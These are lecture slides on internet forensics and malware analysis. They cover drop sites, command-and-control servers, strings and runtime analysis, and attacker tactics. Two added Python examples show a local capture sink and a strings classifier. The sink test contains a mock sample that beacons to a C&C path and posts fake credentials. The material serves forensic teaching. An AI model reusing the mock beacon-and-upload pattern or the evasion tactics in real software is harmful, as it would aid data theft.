Internet Vulnerabilities & Criminal Activity

Internet Forensics
12.1
April 26, 2010

Internet Forensics & Computer Forensics
- Computer Forensics
  - Computer is off / power it off
  - Hard drive is imaged
  - Examination made of the hard drive copy
  - No live capture of memory
- Internet Forensics
  - Done while the computer is on
  - May or may not examine memory
  - Network activity is captured and analyzed

Malware Analysis
- Goal: provide insight into attackers
- Malware has two purposes
  - Steal information from victim computers
  - Commandeer the victim computer's resources for the attacker's use
- Malware secondary features
  - Propagation
  - Locate & terminate security programs & competing malware
  - Hide itself from system administrators

Malware Programs
- Most derived from a small, stable base of existing code
  - Small changes to the obfuscation scheme
  - Command & control credentials change
  - No need to change what works
- Custom programmed malware is unlikely to be identified by security software

Extracting Information
- Author vs attacker
  - More interested in the attacker
- Information that can lead to the attacker's identity
  - How malware interacts with the Internet
  - What type of information is being targeted
  - Commonalities with previously analyzed software

Malware Network Interactions
- Receiving commands
  - Command & control site
- Exfiltrate data
  - Drop site
- Unique identifier (advertising fraud)

Identifying Advertising Revenue
- Advertising fraud
  - Pay-per-view, pay-per-click, pay-per-install
  - To receive revenue, the web site operator must be identified
- Tracking number
  - May be found in the malware
  - May be found in the URL for the advertisement
  - The extracted tracking number is the starting point for identifying the recipient

Identifying Drop Sites
- Malware that steals data will upload it to a specific site for later retrieval
  - Passwords, keystrokes, network traffic, documents
- Data may be uploaded to the drop site using:
  - HTTP
  - FTP
  - E-mail

Identifying Drop Sites cont.
- Drop site location
  - May be hard coded into the malware
  - May be found by a query to a web site or IRC channel
- Possible actions once the drop site is located
  - Analyze traffic to the site to help find the attacker
  - Analyze data at the drop site & inform victims and financial institutions
  - Shut down the drop site
    - Will only work with a hard coded site

Forensic Examination
- Computer is off
  - Image the hard drive on site
  - Transport the computer to the lab and image the hard drive
  - Examine the image in a lab environment
- Computer is on
  - Observe & document the following before shutting the machine down
    - Running processes
    - Open ports
    - Memory
    - Use of encryption

Examination of Malware
- Malware files should be:
  - Located, recovered, neutralized to prevent accidental execution, analyzed
- Antivirus testing
  - Can identify known malware
  - Information can be obtained from the antivirus web site
  - Cannot identify network contact sites
  - Antivirus sites are not detailed or accurate enough for court

Examination of Malware cont.
- Study strings in the binary
  - Locates embedded text
  - Text may be packed to further obfuscate
  - Indicates the malware has specific targets
- Runtime analysis
  - Run the malware in an isolated environment
  - Use a simulation of the Internet & targeted sites
  - Use network tools to observe the malware's behavior
  - Look for:
    - Method used to transfer data
    - Address where data is sent
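The runtime-analysis steps above, as an added example that is not part of the original lecture: a local HTTP sink stands in for the simulated Internet, and a constructed stand-in for a sample (its beacon and upload paths are invented) is pointed at it so the analyst can read off the transfer method and the address the data went to. In a real lab the sample's DNS lookups for its hard-coded C&C or drop-site host would be redirected to the sink rather than the address being passed in.

```python
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

CAPTURED = []  # one record per request the sample makes to the fake Internet

class SinkHandler(BaseHTTPRequestHandler):
    """Stand-in for the drop site / C&C site: accept anything, log everything."""
    def _record(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length) if length else b""
        CAPTURED.append({
            "method": self.command,             # how the data is transferred
            "host": self.headers.get("Host"),   # where the sample sends it
            "path": self.path,
            "body": body.decode("utf-8", "replace"),
        })
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"OK")
    do_GET = do_POST = _record
    def log_message(self, *args):  # keep stderr quiet; CAPTURED is the record
        pass

def start_sink():
    """Listen on an ephemeral localhost port so nothing real is contacted."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), SinkHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def simulated_sample(base_url):
    """Constructed stand-in for a sample: beacon to C&C, then upload 'keystrokes'."""
    urllib.request.urlopen(base_url + "/gate.php?id=BOT-0001", timeout=5).read()
    data = json.dumps({"keys": "user@example.test:hunter2"}).encode()
    req = urllib.request.Request(base_url + "/upload.php", data=data, method="POST")
    urllib.request.urlopen(req, timeout=5).read()

def run_capture():
    """Point the sample at the sink and return everything it sent."""
    srv = start_sink()
    CAPTURED.clear()
    try:
        simulated_sample("http://127.0.0.1:%d" % srv.server_port)
    finally:
        srv.shutdown()
        srv.server_close()
    return list(CAPTURED)
```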

Examination of Malware cont.
- Reverse engineering
  - Converts the file back to source code
  - Needs some understanding of programming
- Identify sites used for command & control (C&C)
  - Central point of communication between malware & attacker
  - C&C sites are usually illegally hosted on compromised servers
  - Look for the host name / IP number of the C&C site
  - The attacker will normally connect to the C&C site using a proxy or other compromised host

Examination of Malware cont.
- Identify C&C site continued
  - Malware identifies the C&C site using an IP address or a DNS resource record
    - An IP address is more vulnerable, as the IP address can be shut down
    - A DNS resource record can simply be resolved to a new IP number
  - Nature of the DNS record can provide leads
    - Contact & payment details
    - Other DNS records with the same contact information
    - Other IP addresses associated with the DNS record
  - The attacker's choice of type of host or network can provide information on the attacker's activities

Extracting Incidental Artifacts
- Can find other information stored in the malware with investigative value
  - Use the "strings" command
  - Messages or comments from the author or attacker
  - Metadata about the development environment
- May be placed in the malware to intentionally mislead investigators
- May lead to the author, not the attacker
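The strings-based examination from the "Study strings in the binary" and "Extracting Incidental Artifacts" slides, as an added example not taken from the lecture: a minimal `strings` equivalent (ASCII and UTF-16LE runs) over a constructed byte blob, followed by a sort of the hits into the lead types discussed (contact sites, transfer method, advertising tracking number, development metadata). The affiliate parameter names, the "compiled" marker and every value in the blob are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed stand-in for a malware image: printable runs, junk bytes and one
# UTF-16LE ("wide") string, which an ASCII-only `strings` run would miss.
SAMPLE_BINARY = (
    b"\x00\x01MZ\x90\x00" + b"\xff" * 8
    + b"POST /upload.php HTTP/1.1\x00"
    + b"http://ads.example.test/click?aff_id=4471923\x00\x17\x9a"
    + b"c2.example.test\x00\x00\x00"
    + b"198.51.100.23\x00\x00"
    + "Compiled on DEVBOX-7 by j.doe".encode("utf-16-le") + b"\x00\x00"
    + b"ab\x01"  # run of two printable bytes: too short to report
)

def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Mimic `strings` and `strings -el`: ASCII and UTF-16LE runs, in file order."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    hits = [(m.start(), m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    hits += [(m.start(), m.group().decode("utf-16-le")) for m in wide_re.finditer(data)]
    return [s for _, s in sorted(hits)]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)
HTTP_RE = re.compile(r"(GET|POST|PUT) /\S*")
# Assumed affiliate/tracking parameter names; extend per advertising network.
TRACK_RE = re.compile(r"[?&](?:aff_id|affid|aid|subid|ref)=([A-Za-z0-9_-]+)")
DEV_RE = re.compile(r"compiled|built by|\\projects\\|\.pdb$", re.I)

def classify(strings: list) -> dict:
    """Sort strings into leads; dev metadata may point to the author, or be planted."""
    leads = defaultdict(list)
    for s in strings:
        for url in URL_RE.findall(s):
            leads["url"].append(url)
            leads["host"].append(urlsplit(url).hostname)
            leads["tracking_id"].extend(TRACK_RE.findall(url))
        if IPV4_RE.fullmatch(s):
            leads["ip"].append(s)            # hard-coded site: can be shut down
        elif HOST_RE.fullmatch(s):
            leads["host"].append(s)          # DNS name: pivot on record details
        if HTTP_RE.match(s):
            leads["transfer_method"].append(s.split()[0])
        if DEV_RE.search(s):
            leads["dev_metadata"].append(s)
    return dict(leads)
```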

More to Learn from Malware
- Two different malware samples using the same C&C site may belong to the same attacker
- Why not go after the author?
  - Prosecution requires:
    - Knowledge
    - Intent
    - Damages & monetary loss
- Techniques used by malware authors point out weaknesses in network security

Attackers
- Will balance cost, risk & potential profit
  - Sophistication is expensive
  - Will only employ sophisticated techniques when there is sufficient profit
  - Will use whatever techniques work
- Understand social behavior
  - Security professionals have limited time / resources and work fixed hours
  - Infrastructure used for the attack will eventually be shut down
  - Schedule attacks to maximize the time until the attack is noticed

Attackers cont.
- Understand the culture of the victims being targeted
  - E-mail, application icons, programs named to be as enticing as possible
- Exploit jurisdictions & geography
  - Know the law enforcement difficulties of working internationally
  - Use several proxies in different countries to route connections
  - Know which countries are weak on cyber enforcement

Attackers cont.
- Monetary thresholds & other crimes
  - Know that most countries have monetary limits on the crimes pursued
  - Internet provides "protection" for attackers
  - Rules for juveniles are different; attackers exploit this
- Study & evade network defenses
  - Understand how firewalls & antivirus software work
  - Have learned how to circumvent security measures
  - Outbound connections to C&C and drop sites
    - Use the ubiquitous HTTP protocol

Supporting Other Investigations
- Malware code analysis may assist in other computer forensic investigations
- Combating the "Malware on the Machine" defense
  - Defendants claim illegal materials on the computer are due to malware
  - Examine the malware on the machine
  - Examine network traffic records
  - Could the malware have committed the crime?
    - Is functionality present in the malware to commit the attack?